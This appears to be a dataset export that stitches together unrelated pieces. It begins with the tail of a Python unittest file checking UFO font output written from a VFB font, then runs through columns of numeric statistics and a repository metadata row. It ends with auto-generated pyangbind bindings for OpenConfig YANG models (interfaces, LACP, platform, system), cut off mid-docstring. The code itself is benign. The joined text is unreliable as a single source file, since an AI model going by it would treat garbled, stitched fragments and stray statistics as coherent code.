self.assertEqual(otherResults["groups"], False)
self.assertEqual(otherResults["features"], False)
self.assertEqual(otherResults["lib"], False)
self.tearDownFont()
def testGroups(self):
self.setUpFont(doGroups=True)
otherResults = self.compareToUFO()
self.assertEqual(otherResults["info"], False)
self.assertEqual(otherResults["kerning"], False)
self.assertEqual(otherResults["groups"], True)
self.assertEqual(otherResults["features"], False)
self.assertEqual(otherResults["lib"], False)
self.tearDownFont()
def testLib(self):
self.setUpFont(doLib=True)
otherResults = self.compareToUFO()
self.assertEqual(otherResults["info"], False)
self.assertEqual(otherResults["kerning"], False)
self.assertEqual(otherResults["groups"], False)
self.assertEqual(otherResults["features"], False)
self.assertEqual(otherResults["lib"], True)
self.tearDownFont()
class WriteUFOFormatVersion1TestCase(unittest.TestCase):
def setUpFont(self, doInfo=False, doKerning=False, doGroups=False):
self.dstDir = tempfile.mktemp()
os.mkdir(self.dstDir)
self.font = OpenFont(vfbPath)
self.font.writeUFO(self.dstDir, doInfo=doInfo, doKerning=doKerning, doGroups=doGroups, formatVersion=1)
self.font.close()
def tearDownFont(self):
shutil.rmtree(self.dstDir)
def compareToUFO(self, doInfo=True, doKerning=True, doGroups=True, doLib=True, doFeatures=True):
readerExpected = UFOReader(ufoPath1)
readerWritten = UFOReader(self.dstDir)
results = {}
if doInfo:
matches = True
expectedPath = os.path.join(ufoPath1, "fontinfo.plist")
writtenPath = os.path.join(self.dstDir, "fontinfo.plist")
if not os.path.exists(writtenPath):
matches = False
else:
expected = readPlist(expectedPath)
written = readPlist(writtenPath)
for attr, expectedValue in expected.items():
if expectedValue != written[attr]:
matches = False
break
results["info"] = matches
if doKerning:
matches = True
expectedPath = os.path.join(ufoPath1, "kerning.plist")
writtenPath = os.path.join(self.dstDir, "kerning.plist")
if not os.path.exists(writtenPath):
matches = False
else:
matches = readPlist(expectedPath) == readPlist(writtenPath)
results["kerning"] = matches
if doGroups:
matches = True
expectedPath = os.path.join(ufoPath1, "groups.plist")
writtenPath = os.path.join(self.dstDir, "groups.plist")
if not os.path.exists(writtenPath):
matches = False
else:
matches = readPlist(expectedPath) == readPlist(writtenPath)
results["groups"] = matches
if doFeatures:
matches = True
featuresPath = os.path.join(self.dstDir, "features.fea")
libPath = os.path.join(self.dstDir, "lib.plist")
if os.path.exists(featuresPath):
matches = False
else:
fontLib = readPlist(libPath)
writtenText = [fontLib.get("org.robofab.opentype.classes", "")]
features = fontLib.get("org.robofab.opentype.features", {})
featureOrder= fontLib.get("org.robofab.opentype.featureorder", [])
for featureName in featureOrder:
writtenText.append(features.get(featureName, ""))
writtenText = "\n".join(writtenText)
# FontLab likes to add lines to the features, so skip blank lines.
expectedText = [line for line in expectedFormatVersion1Features.splitlines() if line]
writtenText = [line for line in writtenText.splitlines() if line]
matches = "\n".join(expectedText) == "\n".join(writtenText)
results["features"] = matches
if doLib:
matches = True
expectedPath = os.path.join(ufoPath1, "lib.plist")
writtenPath = os.path.join(self.dstDir, "lib.plist")
if not os.path.exists(writtenPath):
matches = False
else:
# the test file doesn't have the glyph order
# so purge it from the written
writtenLib = readPlist(writtenPath)
del writtenLib["org.robofab.glyphOrder"]
matches = readPlist(expectedPath) == writtenLib
results["lib"] = matches
return results
def testFull(self):
self.setUpFont(doInfo=True, doKerning=True, doGroups=True)
otherResults = self.compareToUFO()
self.assertEqual(otherResults["info"], True)
self.assertEqual(otherResults["kerning"], True)
self.assertEqual(otherResults["groups"], True)
self.assertEqual(otherResults["features"], True)
self.assertEqual(otherResults["lib"], True)
self.tearDownFont()
def testInfo(self):
self.setUpFont(doInfo=True)
otherResults = self.compareToUFO(doInfo=False)
self.assertEqual(otherResults["kerning"], False)
self.assertEqual(otherResults["groups"], False)
expectedPath = os.path.join(ufoPath1, "fontinfo.plist")
writtenPath = os.path.join(self.dstDir, "fontinfo.plist")
expected = readPlist(expectedPath)
written = readPlist(writtenPath)
for attr, expectedValue in expected.items():
self.assertEqual((attr, expectedValue), (attr, written[attr]))
self.tearDownFont()
def testFeatures(self):
self.setUpFont()
otherResults = self.compareToUFO()
self.assertEqual(otherResults["info"], False)
self.assertEqual(otherResults["kerning"], False)
self.assertEqual(otherResults["groups"], False)
self.assertEqual(otherResults["features"], True)
self.tearDownFont()
def testKerning(self):
self.setUpFont(doKerning=True)
otherResults = self.compareToUFO()
self.assertEqual(otherResults["info"], False)
self.assertEqual(otherResults["kerning"], True)
self.assertEqual(otherResults["groups"], False)
self.tearDownFont()
def testGroups(self):
self.setUpFont(doGroups=True)
otherResults = self.compareToUFO()
self.assertEqual(otherResults["info"], False)
self.assertEqual(otherResults["kerning"], False)
self.assertEqual(otherResults["groups"], True)
self.tearDownFont()
def testLib(self):
self.setUpFont()
otherResults = self.compareToUFO()
self.assertEqual(otherResults["info"], False)
self.assertEqual(otherResults["kerning"], False)
self.assertEqual(otherResults["groups"], False)
self.assertEqual(otherResults["lib"], True)
self.tearDownFont()
class WriteUFOFormatVersion2TestCase(unittest.TestCase):
def setUpFont(self, doInfo=False, doKerning=False, doGroups=False, doLib=False, doFeatures=False):
self.dstDir = tempfile.mktemp()
os.mkdir(self.dstDir)
self.font = OpenFont(vfbPath)
self.font.writeUFO(self.dstDir, doInfo=doInfo, doKerning=doKerning, doGroups=doGroups, doLib=doLib, doFeatures=doFeatures)
self.font.close()
def tearDownFont(self):
shutil.rmtree(self.dstDir)
def compareToUFO(self, doInfo=True, doKerning=True, doGroups=True, doLib=True, doFeatures=True):
readerExpected = UFOReader(ufoPath2)
readerWritten = UFOReader(self.dstDir)
results = {}
if doInfo:
matches = True
expectedPath = os.path.join(ufoPath2, "fontinfo.plist")
writtenPath = os.path.join(self.dstDir, "fontinfo.plist")
if not os.path.exists(writtenPath):
matches = False
else:
dummyFont = NewFont()
_ufoToFLAttrMapping = dict(dummyFont.info._ufoToFLAttrMapping)
dummyFont.close()
expected = readPlist(expectedPath)
written = readPlist(writtenPath)
for attr, expectedValue in expected.items():
# cheat by skipping attrs that aren't supported
if _ufoToFLAttrMapping[attr]["nakedAttribute"] is None:
continue
if expectedValue != written[attr]:
matches = False
break
results["info"] = matches
if doKerning:
matches = True
expectedPath = os.path.join(ufoPath2, "kerning.plist")
writtenPath = os.path.join(self.dstDir, "kerning.plist")
if not os.path.exists(writtenPath):
matches = False
else:
matches = readPlist(expectedPath) == readPlist(writtenPath)
results["kerning"] = matches
if doGroups:
matches = True
expectedPath = os.path.join(ufoPath2, "groups.plist")
writtenPath = os.path.join(self.dstDir, "groups.plist")
if not os.path.exists(writtenPath):
matches = False
else:
matches = readPlist(expectedPath) == readPlist(writtenPath)
results["groups"] = matches
if doFeatures:
matches = True
expectedPath = os.path.join(ufoPath2, "features.fea")
writtenPath = os.path.join(self.dstDir, "features.fea")
if not os.path.exists(writtenPath):
matches = False
else:
f = open(expectedPath, "r")
expectedText = f.read()
f.close()
f = open(writtenPath, "r")
writtenText = f.read()
f.close()
# FontLab likes to add lines to the features, so skip blank lines.
expectedText = [line for line in expectedText.splitlines() if line]
writtenText = [line for line in writtenText.splitlines() if line]
matches = "\n".join(expectedText) == "\n".join(writtenText)
results["features"] = matches
if doLib:
matches = True
expectedPath = os.path.join(ufoPath2, "lib.plist")
writtenPath = os.path.join(self.dstDir, "lib.plist")
if not os.path.exists(writtenPath):
matches = False
else:
# the test file doesn't have the glyph order
# so purge it from the written
writtenLib = readPlist(writtenPath)
del writtenLib["org.robofab.glyphOrder"]
matches = readPlist(expectedPath) == writtenLib
results["lib"] = matches
return results
def testFull(self):
self.setUpFont(doInfo=True, doKerning=True, doGroups=True, doFeatures=True, doLib=True)
otherResults = self.compareToUFO()
self.assertEqual(otherResults["info"], True)
self.assertEqual(otherResults["kerning"], True)
self.assertEqual(otherResults["groups"], True)
self.assertEqual(otherResults["features"], True)
self.assertEqual(otherResults["lib"], True)
self.tearDownFont()
def testInfo(self):
self.setUpFont(doInfo=True)
otherResults = self.compareToUFO(doInfo=False)
self.assertEqual(otherResults["kerning"], False)
self.assertEqual(otherResults["groups"], False)
self.assertEqual(otherResults["features"], False)
self.assertEqual(otherResults["lib"], False)
expectedPath = os.path.join(ufoPath2, "fontinfo.plist")
writtenPath = os.path.join(self.dstDir, "fontinfo.plist")
expected = readPlist(expectedPath)
written = readPlist(writtenPath)
dummyFont = NewFont()
_ufoToFLAttrMapping = dict(dummyFont.info._ufoToFLAttrMapping)
dummyFont.close()
for attr, expectedValue in expected.items():
# cheat by skipping attrs that aren't supported
if _ufoToFLAttrMapping[attr]["nakedAttribute"] is None:
continue
self.assertEqual((attr, expectedValue), (attr, written[attr]))
self.tearDownFont()
def testFeatures(self):
self.setUpFont(doFeatures=True)
otherResults = self.compareToUFO()
self.assertEqual(otherResults["info"], False)
self.assertEqual(otherResults["kerning"], False)
self.assertEqual(otherResults["groups"], False)
self.assertEqual(otherResults["features"], True)
self.assertEqual(otherResults["lib"], False)
self.tearDownFont()
def testKerning(self):
self.setUpFont(doKerning=True)
otherResults = self.compareToUFO()
self.assertEqual(otherResults["info"], False)
self.assertEqual(otherResults["kerning"], True)
self.assertEqual(otherResults["groups"], False)
self.assertEqual(otherResults["features"], False)
self.assertEqual(otherResults["lib"], False)
self.tearDownFont()
def testGroups(self):
self.setUpFont(doGroups=True)
otherResults = self.compareToUFO()
self.assertEqual(otherResults["info"], False)
self.assertEqual(otherResults["kerning"], False)
self.assertEqual(otherResults["groups"], True)
self.assertEqual(otherResults["features"], False)
self.assertEqual(otherResults["lib"], False)
self.tearDownFont()
def testLib(self):
self.setUpFont(doLib=True)
otherResults = self.compareToUFO()
self.assertEqual(otherResults["info"], False)
self.assertEqual(otherResults["kerning"], False)
self.assertEqual(otherResults["groups"], False)
self.assertEqual(otherResults["features"], False)
self.assertEqual(otherResults["lib"], True)
self.tearDownFont()
if __name__ == "__main__":
from robofab.test.testSupport import runTests
runTests()
| 35.720848
| 124
| 0.735681
| 2,232
| 20,218
| 6.653226
| 0.081989
| 0.113131
| 0.196364
| 0.133603
| 0.902963
| 0.889764
| 0.889024
| 0.878114
| 0.866734
| 0.850707
| 0
| 0.002974
| 0.135078
| 20,218
| 565
| 125
| 35.784071
| 0.846229
| 0.028539
| 0
| 0.854
| 0
| 0
| 0.076218
| 0.012941
| 0
| 0
| 0
| 0
| 0.224
| 1
| 0.072
| false
| 0
| 0.02
| 0
| 0.108
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
53327b75d25ba5f1eda75bbe94ebad66dc92d777
| 75,794
|
py
|
Python
|
ocbind/__init__.py
|
SeanCondon/onos-config-demo
|
0789d397b46fd5cda512ae7fffe35e1a4bfdfdbe
|
[
"Apache-2.0"
] | 1
|
2019-08-01T17:42:57.000Z
|
2019-08-01T17:42:57.000Z
|
ocbind/__init__.py
|
SeanCondon/onos-config-demo
|
0789d397b46fd5cda512ae7fffe35e1a4bfdfdbe
|
[
"Apache-2.0"
] | 1
|
2021-05-26T16:38:04.000Z
|
2021-05-26T16:38:04.000Z
|
ocbind/__init__.py
|
SeanCondon/onos-config-demo
|
0789d397b46fd5cda512ae7fffe35e1a4bfdfdbe
|
[
"Apache-2.0"
] | 4
|
2019-07-24T16:52:39.000Z
|
2021-12-03T02:08:13.000Z
|
# -*- coding: utf-8 -*-
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType
from pyangbind.lib.yangtypes import RestrictedClassType
from pyangbind.lib.yangtypes import TypedListType
from pyangbind.lib.yangtypes import YANGBool
from pyangbind.lib.yangtypes import YANGListType
from pyangbind.lib.yangtypes import YANGDynClass
from pyangbind.lib.yangtypes import ReferenceType
from pyangbind.lib.base import PybindBase
from collections import OrderedDict
from decimal import Decimal
from bitarray import bitarray
import six
# PY3 support of some PY2 keywords (needs improved)
if six.PY3:
import builtins as __builtin__
long = int
elif six.PY2:
import __builtin__
from . import interfaces
class openconfig_interfaces(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-interfaces - based on the path /openconfig-interfaces. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: Model for managing network interfaces and subinterfaces. This
module also defines convenience types / groupings for other
models to create references to interfaces:
base-interface-ref (type) - reference to a base interface
interface-ref (grouping) - container for reference to a
interface + subinterface
interface-ref-state (grouping) - container for read-only
(opstate) reference to interface + subinterface
This model reuses data items defined in the IETF YANG model for
interfaces described by RFC 7223 with an alternate structure
(particularly for operational state data) and with
additional configuration items.
Portions of this code were derived from IETF RFC 7223.
Please reproduce this note if possible.
IETF code is subject to the following copyright and license:
Copyright (c) IETF Trust and the persons identified as authors of
the code.
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, is permitted pursuant to, and subject to the license
terms contained in, the Simplified BSD License set forth in
Section 4.c of the IETF Trust's Legal Provisions Relating
to IETF Documents (http://trustee.ietf.org/license-info).
"""
__slots__ = ('_path_helper', '_extmethods', '__interfaces',)
_yang_name = 'openconfig-interfaces'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
helper = kwargs.pop("path_helper", None)
if helper is False:
self._path_helper = False
elif helper is not None and isinstance(helper, xpathhelper.YANGPathHelper):
self._path_helper = helper
elif hasattr(self, "_parent"):
helper = getattr(self._parent, "_path_helper", False)
self._path_helper = helper
else:
self._path_helper = False
self._extmethods = False
self.__interfaces = YANGDynClass(base=interfaces.interfaces, is_container='container', yang_name="interfaces", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/interfaces', defining_module='openconfig-interfaces', yang_type='container', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return []
def _get_interfaces(self):
"""
Getter method for interfaces, mapped from YANG variable /interfaces (container)
YANG Description: Top level container for interfaces, including configuration
and state data.
"""
return self.__interfaces
def _set_interfaces(self, v, load=False):
"""
Setter method for interfaces, mapped from YANG variable /interfaces (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_interfaces is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_interfaces() directly.
YANG Description: Top level container for interfaces, including configuration
and state data.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=interfaces.interfaces, is_container='container', yang_name="interfaces", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/interfaces', defining_module='openconfig-interfaces', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """interfaces must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=interfaces.interfaces, is_container='container', yang_name="interfaces", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/interfaces', defining_module='openconfig-interfaces', yang_type='container', is_config=True)""",
})
self.__interfaces = t
if hasattr(self, '_set'):
self._set()
def _unset_interfaces(self):
self.__interfaces = YANGDynClass(base=interfaces.interfaces, is_container='container', yang_name="interfaces", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/interfaces', defining_module='openconfig-interfaces', yang_type='container', is_config=True)
interfaces = __builtin__.property(_get_interfaces, _set_interfaces)
_pyangbind_elements = OrderedDict([('interfaces', interfaces), ])
class openconfig_if_ip(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-if-ip - based on the path /openconfig-if-ip. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This model defines data for managing configuration and
operational state on IP (IPv4 and IPv6) interfaces.
This model reuses data items defined in the IETF YANG model for
interfaces described by RFC 7277 with an alternate structure
(particularly for operational state data) and with
additional configuration items.
Portions of this code were derived from IETF RFC 7277.
Please reproduce this note if possible.
IETF code is subject to the following copyright and license:
Copyright (c) IETF Trust and the persons identified as authors of
the code.
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, is permitted pursuant to, and subject to the license
terms contained in, the Simplified BSD License set forth in
Section 4.c of the IETF Trust's Legal Provisions Relating
to IETF Documents (http://trustee.ietf.org/license-info).
"""
_pyangbind_elements = {}
from . import lacp
class openconfig_lacp(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-lacp - based on the path /openconfig-lacp. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This module describes configuration and operational state
data for Link Aggregation Control Protocol (LACP) for
managing aggregate interfaces. It works in conjunction with
the OpenConfig interfaces and aggregate interfaces models.
"""
__slots__ = ('_path_helper', '_extmethods', '__lacp',)
_yang_name = 'openconfig-lacp'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
helper = kwargs.pop("path_helper", None)
if helper is False:
self._path_helper = False
elif helper is not None and isinstance(helper, xpathhelper.YANGPathHelper):
self._path_helper = helper
elif hasattr(self, "_parent"):
helper = getattr(self._parent, "_path_helper", False)
self._path_helper = helper
else:
self._path_helper = False
self._extmethods = False
self.__lacp = YANGDynClass(base=lacp.lacp, is_container='container', yang_name="lacp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/lacp', defining_module='openconfig-lacp', yang_type='container', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return []
def _get_lacp(self):
"""
Getter method for lacp, mapped from YANG variable /lacp (container)
YANG Description: Configuration and operational state data for LACP protocol
operation on the aggregate interface
"""
return self.__lacp
def _set_lacp(self, v, load=False):
"""
Setter method for lacp, mapped from YANG variable /lacp (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_lacp is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lacp() directly.
YANG Description: Configuration and operational state data for LACP protocol
operation on the aggregate interface
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=lacp.lacp, is_container='container', yang_name="lacp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/lacp', defining_module='openconfig-lacp', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lacp must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=lacp.lacp, is_container='container', yang_name="lacp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/lacp', defining_module='openconfig-lacp', yang_type='container', is_config=True)""",
})
self.__lacp = t
if hasattr(self, '_set'):
self._set()
def _unset_lacp(self):
self.__lacp = YANGDynClass(base=lacp.lacp, is_container='container', yang_name="lacp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/lacp', defining_module='openconfig-lacp', yang_type='container', is_config=True)
lacp = __builtin__.property(_get_lacp, _set_lacp)
_pyangbind_elements = OrderedDict([('lacp', lacp), ])
from . import components
class openconfig_platform(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-platform - based on the path /openconfig-platform. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This module defines a data model for representing a system
component inventory, which can include hardware or software
elements arranged in an arbitrary structure. The primary
relationship supported by the model is containment, e.g.,
components containing subcomponents.
It is expected that this model reflects every field replacable
unit on the device at a minimum (i.e., additional information
may be supplied about non-replacable components).
Every element in the inventory is termed a 'component' with each
component expected to have a unique name and type, and optionally
a unique system-assigned identifier and FRU number. The
uniqueness is guaranteed by the system within the device.
Components may have properties defined by the system that are
modeled as a list of key-value pairs. These may or may not be
user-configurable. The model provides a flag for the system
to optionally indicate which properties are user configurable.
Each component also has a list of 'subcomponents' which are
references to other components. Appearance in a list of
subcomponents indicates a containment relationship as described
above. For example, a linecard component may have a list of
references to port components that reside on the linecard.
This schema is generic to allow devices to express their own
platform-specific structure. It may be augmented by additional
component type-specific schemas that provide a common structure
for well-known component types. In these cases, the system is
expected to populate the common component schema, and may
optionally also represent the component and its properties in the
generic structure.
The properties for each component may include dynamic values,
e.g., in the 'state' part of the schema. For example, a CPU
component may report its utilization, temperature, or other
physical properties. The intent is to capture all platform-
specific physical data in one location, including inventory
(presence or absence of a component) and state (physical
attributes or status).
"""
__slots__ = ('_path_helper', '_extmethods', '__components',)
_yang_name = 'openconfig-platform'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
helper = kwargs.pop("path_helper", None)
if helper is False:
self._path_helper = False
elif helper is not None and isinstance(helper, xpathhelper.YANGPathHelper):
self._path_helper = helper
elif hasattr(self, "_parent"):
helper = getattr(self._parent, "_path_helper", False)
self._path_helper = helper
else:
self._path_helper = False
self._extmethods = False
self.__components = YANGDynClass(base=components.components, is_container='container', yang_name="components", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/platform', defining_module='openconfig-platform', yang_type='container', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return []
def _get_components(self):
"""
Getter method for components, mapped from YANG variable /components (container)
YANG Description: Enclosing container for the components in the system.
"""
return self.__components
def _set_components(self, v, load=False):
"""
Setter method for components, mapped from YANG variable /components (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_components is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_components() directly.
YANG Description: Enclosing container for the components in the system.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=components.components, is_container='container', yang_name="components", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/platform', defining_module='openconfig-platform', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """components must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=components.components, is_container='container', yang_name="components", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/platform', defining_module='openconfig-platform', yang_type='container', is_config=True)""",
})
self.__components = t
if hasattr(self, '_set'):
self._set()
def _unset_components(self):
self.__components = YANGDynClass(base=components.components, is_container='container', yang_name="components", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/platform', defining_module='openconfig-platform', yang_type='container', is_config=True)
components = __builtin__.property(_get_components, _set_components)
_pyangbind_elements = OrderedDict([('components', components), ])
class openconfig_platform_linecard(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-platform-linecard - based on the path /openconfig-platform-linecard. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This module defines data related to LINECARD components in
the openconfig-platform model
"""
_pyangbind_elements = {}
class openconfig_platform_port(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-platform-port - based on the path /openconfig-platform-port. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This module defines data related to PORT components in the
openconfig-platform model
"""
_pyangbind_elements = {}
class openconfig_platform_transceiver(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-platform-transceiver - based on the path /openconfig-platform-transceiver. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This module defines configuration and operational state data
for transceivers (i.e., pluggable optics). The module should be
used in conjunction with the platform model where other
physical entity data are represented.
In the platform model, a component of type=TRANSCEIVER is
expected to be a subcomponent of a PORT component. This
module defines a concrete schema for the associated data for
components with type=TRANSCEIVER.
"""
_pyangbind_elements = {}
class openconfig_vlan(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-vlan - based on the path /openconfig-vlan. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This module defines configuration and state variables for VLANs,
in addition to VLAN parameters associated with interfaces
"""
_pyangbind_elements = {}
from . import system
class openconfig_system(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-system - based on the path /openconfig-system. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: Model for managing system-wide services and functions on
network devices.
Portions of this code were derived from IETF RFC 7317.
Please reproduce this note if possible.
IETF code is subject to the following copyright and license:
Copyright (c) IETF Trust and the persons identified as authors of
the code.
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, is permitted pursuant to, and subject to the license
terms contained in, the Simplified BSD License set forth in
Section 4.c of the IETF Trust's Legal Provisions Relating
to IETF Documents (http://trustee.ietf.org/license-info).
"""
__slots__ = ('_path_helper', '_extmethods', '__system',)
_yang_name = 'openconfig-system'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
helper = kwargs.pop("path_helper", None)
if helper is False:
self._path_helper = False
elif helper is not None and isinstance(helper, xpathhelper.YANGPathHelper):
self._path_helper = helper
elif hasattr(self, "_parent"):
helper = getattr(self._parent, "_path_helper", False)
self._path_helper = helper
else:
self._path_helper = False
self._extmethods = False
self.__system = YANGDynClass(base=system.system, is_container='container', yang_name="system", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/system', defining_module='openconfig-system', yang_type='container', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return []
def _get_system(self):
"""
Getter method for system, mapped from YANG variable /system (container)
YANG Description: Enclosing container for system-related configuration and
operational state data
"""
return self.__system
def _set_system(self, v, load=False):
"""
Setter method for system, mapped from YANG variable /system (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_system is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_system() directly.
YANG Description: Enclosing container for system-related configuration and
operational state data
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=system.system, is_container='container', yang_name="system", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/system', defining_module='openconfig-system', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """system must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=system.system, is_container='container', yang_name="system", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/system', defining_module='openconfig-system', yang_type='container', is_config=True)""",
})
self.__system = t
if hasattr(self, '_set'):
self._set()
def _unset_system(self):
self.__system = YANGDynClass(base=system.system, is_container='container', yang_name="system", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/system', defining_module='openconfig-system', yang_type='container', is_config=True)
system = __builtin__.property(_get_system, _set_system)
_pyangbind_elements = OrderedDict([('system', system), ])
from . import interfaces
class openconfig_interfaces(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-interfaces - based on the path /openconfig-interfaces. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: Model for managing network interfaces and subinterfaces. This
module also defines convenience types / groupings for other
models to create references to interfaces:
base-interface-ref (type) - reference to a base interface
interface-ref (grouping) - container for reference to a
interface + subinterface
interface-ref-state (grouping) - container for read-only
(opstate) reference to interface + subinterface
This model reuses data items defined in the IETF YANG model for
interfaces described by RFC 7223 with an alternate structure
(particularly for operational state data) and with
additional configuration items.
Portions of this code were derived from IETF RFC 7223.
Please reproduce this note if possible.
IETF code is subject to the following copyright and license:
Copyright (c) IETF Trust and the persons identified as authors of
the code.
All rights reserved.
